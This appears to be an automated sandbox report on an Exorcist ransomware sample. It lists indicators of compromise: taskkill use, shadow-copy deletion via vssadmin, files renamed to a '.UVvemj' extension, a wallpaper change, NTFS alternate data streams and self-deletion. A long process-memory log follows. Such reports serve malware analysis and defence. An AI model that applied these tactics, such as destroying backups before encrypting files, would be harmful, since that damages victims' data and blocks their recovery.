Analysis
max time kernel: 112s
max time network: 120s
platform: windows7_x64
resource: win7
submitted: 23-07-2020 13:40
Static task: static1
Behavioral task: behavioral1
Sample: build-x32.crypt.bin.exe
Resource: win7 (windows7_x64)
0 signatures, 0 seconds
Behavioral task: behavioral2
Sample: build-x32.crypt.bin.exe
Resource: win10 (windows10_x64)
0 signatures, 0 seconds
General
Target: build-x32.crypt.bin.exe
Score: 10/10
Malware Config
Signatures
Enumerates connected drives 3 TTPs
Deletes itself 1 IoCs
pid | Process
292 | cmd.exe
Kills process with taskkill 91 IoCs
Suspicious behavior: EnumeratesProcesses 358 IoCs
Modifies service 2 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1816 | vssadmin.exe
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\ResumeAssert.crw => C:\Users\Admin\Pictures\ResumeAssert.crw.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\ResumeAssert.crw.UVvemj | build-x32.crypt.bin.exe
File renamed | C:\Users\Admin\Pictures\SwitchImport.png => C:\Users\Admin\Pictures\SwitchImport.png.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\SwitchImport.png.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\DisableInitialize.crw.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\EditExpand.png.UVvemj | build-x32.crypt.bin.exe
File renamed | C:\Users\Admin\Pictures\InvokeConvert.tiff => C:\Users\Admin\Pictures\InvokeConvert.tiff.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\InvokeConvert.tiff.UVvemj | build-x32.crypt.bin.exe
File renamed | C:\Users\Admin\Pictures\DisableInitialize.crw => C:\Users\Admin\Pictures\DisableInitialize.crw.UVvemj | build-x32.crypt.bin.exe
File renamed | C:\Users\Admin\Pictures\EditExpand.png => C:\Users\Admin\Pictures\EditExpand.png.UVvemj | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\Pictures\InvokeConvert.tiff | build-x32.crypt.bin.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp" | build-x32.crypt.bin.exe
NTFS ADS 5 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:ftztnzezfosqioqjq | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\boot.sys:qncbeovltenni | build-x32.crypt.bin.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo | build-x32.crypt.bin.exe
File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:fwsjvisltoiwhlkd | build-x32.crypt.bin.exe
File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo | build-x32.crypt.bin.exe
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
Delays execution with timeout.exe 1 IoCs
pid | Process
792 | timeout.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Suspicious use of WriteProcessMemory 772 IoCs
1396 wrote to memory of 1856 1396 cmd.exe 172 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 
build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 
build-x32.crypt.bin.exe 197 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1964 wrote to 
memory of 528 1964 cmd.exe 211 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 
224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 
1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 
PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1124 wrote to memory of 2044 1124 
build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 2044 wrote to memory of 1852 2044 cmd.exe 265 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1124 wrote to memory of 1508 1124 build-x32.crypt.bin.exe 266 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1508 wrote to memory of 2036 1508 cmd.exe 268 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1124 wrote to memory of 1520 1124 build-x32.crypt.bin.exe 269 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1520 wrote to memory of 1964 1520 cmd.exe 271 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1124 wrote to memory of 1712 1124 build-x32.crypt.bin.exe 272 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1712 wrote to memory of 1440 1712 cmd.exe 274 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 
build-x32.crypt.bin.exe 275 PID 1124 wrote to memory of 1392 1124 build-x32.crypt.bin.exe 275 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1392 wrote to memory of 1536 1392 cmd.exe 277 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 278 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 2024 wrote to memory of 668 2024 cmd.exe 280 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 281 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 2020 wrote to memory of 576 2020 cmd.exe 283 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 284 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1824 wrote to memory of 1828 1824 cmd.exe 286 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 287 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 
1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1512 wrote to memory of 1760 1512 cmd.exe 289 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 290 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1720 wrote to memory of 1860 1720 cmd.exe 292 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1124 wrote to memory of 1784 1124 build-x32.crypt.bin.exe 293 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1784 wrote to memory of 1916 1784 cmd.exe 295 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1124 wrote to memory of 1988 1124 build-x32.crypt.bin.exe 296 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1988 wrote to memory of 1648 1988 cmd.exe 298 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 299 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 PID 1656 wrote to memory of 432 1656 cmd.exe 301 
PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 302 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 284 wrote to memory of 520 284 cmd.exe 304 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1124 wrote to memory of 1540 1124 build-x32.crypt.bin.exe 305 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1540 wrote to memory of 2008 1540 cmd.exe 307 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1124 wrote to memory of 1352 1124 build-x32.crypt.bin.exe 308 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1352 wrote to memory of 1580 1352 cmd.exe 310 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1124 wrote to memory of 1616 1124 build-x32.crypt.bin.exe 311 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1616 wrote to memory of 1128 1616 cmd.exe 313 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 
1836 1124 build-x32.crypt.bin.exe 314 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 314 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1836 wrote to memory of 1584 1836 cmd.exe 316 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 322 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 PID 292 wrote to memory of 792 292 cmd.exe 324 -
Suspicious use of AdjustPrivilegeToken 131 IoCs
Processes
